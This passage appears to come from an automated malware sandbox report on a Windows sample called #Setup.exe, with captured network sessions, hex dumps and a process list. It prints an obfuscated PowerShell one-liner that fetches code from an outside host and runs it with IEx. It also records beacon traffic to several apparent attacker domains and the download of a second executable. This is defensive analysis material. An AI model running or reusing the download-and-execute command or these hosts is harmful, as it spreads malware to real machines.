b8 39 1e 80 87 f5 87 98 5e 12 8f 2b cb 24 81 10 d3 51 9a ce 44 37 e9 23 98 0c de 1a e6 ec 25 f6 e5 bd 8c fd bc 73 e4 cd 93 eb 79 e0 58 0f 7d 82 e7 9d Data Ascii: \2whrN{Q~jR ]B:Q0""9`hQO{ jO%@uG5x""V.lx^XFe\|n`'G'D$xRQS4mN\|u0k]%LN@Oj\|W1\|i1d ]w_e9^+$QD7#%syX}
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: 68 ea 08 c8 53 88 0b ed 72 d9 78 3f f7 32 c8 68 57 aa 0d 3a ec 65 93 ee 18 77 30 23 d5 3e 33 72 bf 6c b3 ad de 93 ea a7 98 7e 25 15 38 00 3a f8 d7 3f ba 51 c4 6c d5 61 e6 59 c4 df 57 30 c9 f3 8c 74 76 2e 0b ef ed 03 fd 5a 2d 4c 42 d6 a1 b1 d9 b9 c0 c1 39 aa 0b d1 fc 80 3e 29 54 2f e1 d0 86 a0 28 2f 98 e6 10 53 12 15 5e 7f 21 cc 8d 8a 52 8c f9 d2 ab 6f ff 92 bf 46 69 b8 0d 61 85 85 62 4e 38 0c 55 bd 7c 82 6f e1 d5 29 53 dc 8a 8c e4 3b ce 87 f5 ca 50 55 99 59 07 c3 8c f8 ad 2d e0 19 63 47 cf db 89 f1 e1 f0 ea 93 3f 74 a3 48 1d 2c 54 2c e3 c5 12 17 0b 8a 65 4a 85 d7 cf 5a 50 55 d1 d7 10 94 e6 15 81 67 92 5c d5 20 a1 b8 75 6f 57 26 e8 05 01 02 dc 77 da 82 72 3f b6 9d d5 b4 8b 44 7a 04 eb e3 9a 57 b5 99 aa 6a 2a 39 59 57 c7 7e ca ba b7 2c a9 cb b7 87 05 f5 67 Data Ascii: hSrx?2hW:ew0#>3rl~%8:?QlaYW0tv.Z-LB9>)T/(/S^!RoFiabN8U\|o)S;PUY-cG?tH,T,eJZPUg\ uoW&wr?DzWj*9YW~,g
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: 16 a0 d4 0a 92 36 61 48 98 a3 05 ea 43 67 86 ab 9b 21 2a 0e 91 8c e1 b9 be 9b 9f 6a f9 ba 30 ef 3b c8 1f ea 5d 1c f0 f3 0c 9f eb 5d ad da 7b 5a 2b 68 f6 33 d9 6f 16 43 1f 32 e7 c4 64 9d 6a a4 d3 fd 5e f9 b3 b9 77 fd d9 3c 83 b1 59 5d 0a 4b 9d f8 9f da c0 5e e2 17 f4 38 db 07 e2 d3 c4 28 e3 10 ab db 86 3c 65 3e ff a1 b0 f4 77 b0 fb b8 f8 c7 89 f5 37 28 e0 36 3c 38 c0 be 0e e4 49 d9 d5 91 33 8d b3 1b 8e f4 a1 fe 70 56 3b 0b 81 02 e1 fe cb 0b d7 36 22 dc 6f 03 bd 52 20 28 08 dc 87 3d 27 11 f0 c0 4e 17 78 e0 0f 98 3f 2c 70 0b 8f ab ae d6 3a 16 ce 49 80 c8 72 19 b0 42 e0 f7 ed 9c 15 04 fd a8 d5 98 a5 94 f9 b9 07 9e 8f fd ec cd 96 ef 39 57 de 28 2e 6f b2 62 46 3a 27 7e b8 08 0c cf 10 68 4f 00 eb 7e 34 ec bc 0b 64 ec 71 f8 df 71 b1 ce 6d 60 5a 16 21 08 9c 9c 1e Data Ascii: 6aHCg!*j0;]]{Z+h3oC2dj^w<Y]K^8(<e>w7(6<8I3pV;6"oR (='Nx?,p:IrB9W(.obF:'~hO~4dqqm`Z!
2024-12-30 17:15:24 UTC	1139	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=28brb90fqprcp9p3mrv4cg62gc; expires=Fri, 25 Apr 2025 11:02:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UWfZFrfl71F009Q9vcrjPzz0U%2FlCxy17TMe%2Buo7oAzjUhhKxg2jKb2O6x%2FGNN3RDeJGgDd0235GhPJ533TRz5Ou%2BaiV%2Bu7Y2yRJCxSMD234t0hgRyY0Y20YpLqutE5oV38uz%2F64V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3abeb88d58c71-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1786&rtt_var=684&sent=199&recv=594&lost=0&retrans=0&sent_bytes=2845&recv_bytes=578666&delivery_rate=1583514&cwnd=193&unsent_bytes=0&cid=f4d3b47089b53554&ts=1606&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49789	188.114.97.3	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:24 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 113 Host: locketsashayz.click
2024-12-30 17:15:24 UTC	113	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 34 45 44 41 34 32 42 31 32 35 41 39 32 45 31 39 31 44 44 43 42 37 41 42 36 43 39 43 34 34 42 30 Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=4EDA42B125A92E191DDCB7AB6C9C44B0
2024-12-30 17:15:25 UTC	1126	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uso3p1872hme7to1pbt2tj2ovb; expires=Fri, 25 Apr 2025 11:02:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UiU%2FcCq0WyMXkFti54%2BBIiVS3vUGAMy3bTFH%2Fgjkl4WqkuubQpWb7EiU8Yadz8xASukhlXKQfi39AUGj9lDrmb9EEJfYin32vxd6iLHUkfbXtBvTEE8DkEtnG8QMbwwJlW3egIQ8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3abf8cf1d8c24-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1801&rtt_var=696&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1017&delivery_rate=1550716&cwnd=141&unsent_bytes=0&cid=30fde99d38950114&ts=487&x=0"
2024-12-30 17:15:25 UTC	218	IN	Data Raw: 64 34 0d 0a 32 61 32 63 45 76 7a 52 6d 61 4a 70 49 30 38 7a 2b 6e 49 68 59 45 44 6b 74 47 72 38 62 56 39 6f 79 74 43 38 6c 69 32 4d 64 62 79 43 31 72 35 6e 33 75 75 37 79 68 31 58 50 30 44 41 4c 67 34 38 62 34 66 52 44 59 6c 44 4c 41 43 6c 6f 4f 43 35 46 62 6c 43 69 4f 75 62 72 69 62 49 35 38 57 4e 47 55 74 68 52 34 49 47 41 30 78 69 67 73 42 49 78 6c 39 7a 53 71 2f 79 68 71 64 51 6f 41 36 65 72 49 2b 6d 4d 4a 53 6c 37 64 49 61 47 52 4d 63 70 6c 31 4b 44 43 6d 55 77 68 2b 52 42 43 77 64 6f 2f 37 50 2f 6b 4c 38 4b 5a 4f 77 77 2b 68 4e 6e 37 33 70 2f 52 70 4c 4c 68 32 4f 43 6c 56 43 62 4d 62 53 48 74 35 58 62 30 54 6f 74 5a 36 73 48 66 45 6f 0d 0a Data Ascii: d42a2cEvzRmaJpI08z+nIhYEDktGr8bV9oytC8li2MdbyC1r5n3uu7yh1XP0DALg48b4fRDYlDLACloOC5FblCiOubribI58WNGUthR4IGA0xigsBIxl9zSq/yhqdQoA6erI+mMJSl7dIaGRMcpl1KDCmUwh+RBCwdo/7P/kL8KZOww+hNn73p/RpLLh2OClVCbMbSHt5Xb0TotZ6sHfEo
2024-12-30 17:15:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49800	185.161.251.21	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:26 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2024-12-30 17:15:26 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 30 Dec 2024 17:15:26 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2024-12-30 17:15:26 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49805	104.21.37.128	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:26 UTC	206	OUT	GET /int_clp_sha.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: klipvumisui.shop
2024-12-30 17:15:27 UTC	905	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:27 GMT Content-Type: text/plain Content-Length: 8767044 Connection: close Accept-Ranges: bytes ETag: "51f99eddd33cc04fb0f55f873b76d907" Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BSKornCF4xp0G3Sd0uTdJJbj4ugciSy%2FCXyShxS1p9dI%2Fsu%2FEwgVLd9v3DJtaClehNMfNKADjdDIXYSeTlrd2wuKQPpElMZeBZCva2aeMhrrdUOrSxFGg88icB92ZDe1ObJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3ac059f1042e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=15448&min_rtt=1689&rtt_var=8926&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1728833&cwnd=232&unsent_bytes=0&cid=936e84af0e34e2a8&ts=352&x=0"
2024-12-30 17:15:27 UTC	464	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-12-30 17:15:27 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
2024-12-30 17:15:27 UTC	1369	IN	Data Raw: 13 40 00 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 Data Ascii: @HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
2024-12-30 17:15:27 UTC	1369	IN	Data Raw: 40 00 4a 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 Data Ascii: @Jr@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(J
2024-12-30 17:15:27 UTC	1369	IN	Data Raw: 12 40 00 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 Data Ascii: @[@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage
2024-12-30 17:15:27 UTC	1369	IN	Data Raw: 66 02 00 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 Data Ascii: f@AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMoni
2024-12-30 17:15:27 UTC	1369	IN	Data Raw: 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc Data Ascii: erConstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$A
2024-12-30 17:15:27 UTC	1369	IN	Data Raw: 08 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUSt
2024-12-30 17:15:27 UTC	1369	IN	Data Raw: 00 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@C
2024-12-30 17:15:27 UTC	1369	IN	Data Raw: 02 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(J

Target ID:	0
Start time:	12:15:01
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\#Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#Setup.exe"
Imagebase:	0x400000
File size:	74'253'304 bytes
MD5 hash:	87186256E55365349FA7FC41C9F1C913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:15:25
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Imagebase:	0xf80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:15:25
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:15:33
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe"
Imagebase:	0xfc0000
File size:	8'767'044 bytes
MD5 hash:	51F99EDDD33CC04FB0F55F873B76D907
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:15:35
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp" /SL5="$2043C,7785838,845824,C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe"
Imagebase:	0xe10000
File size:	3'367'424 bytes
MD5 hash:	F809F51E678B7F2E388F8C969EF902C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:15:36
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe
Wow64 process (32bit):	true
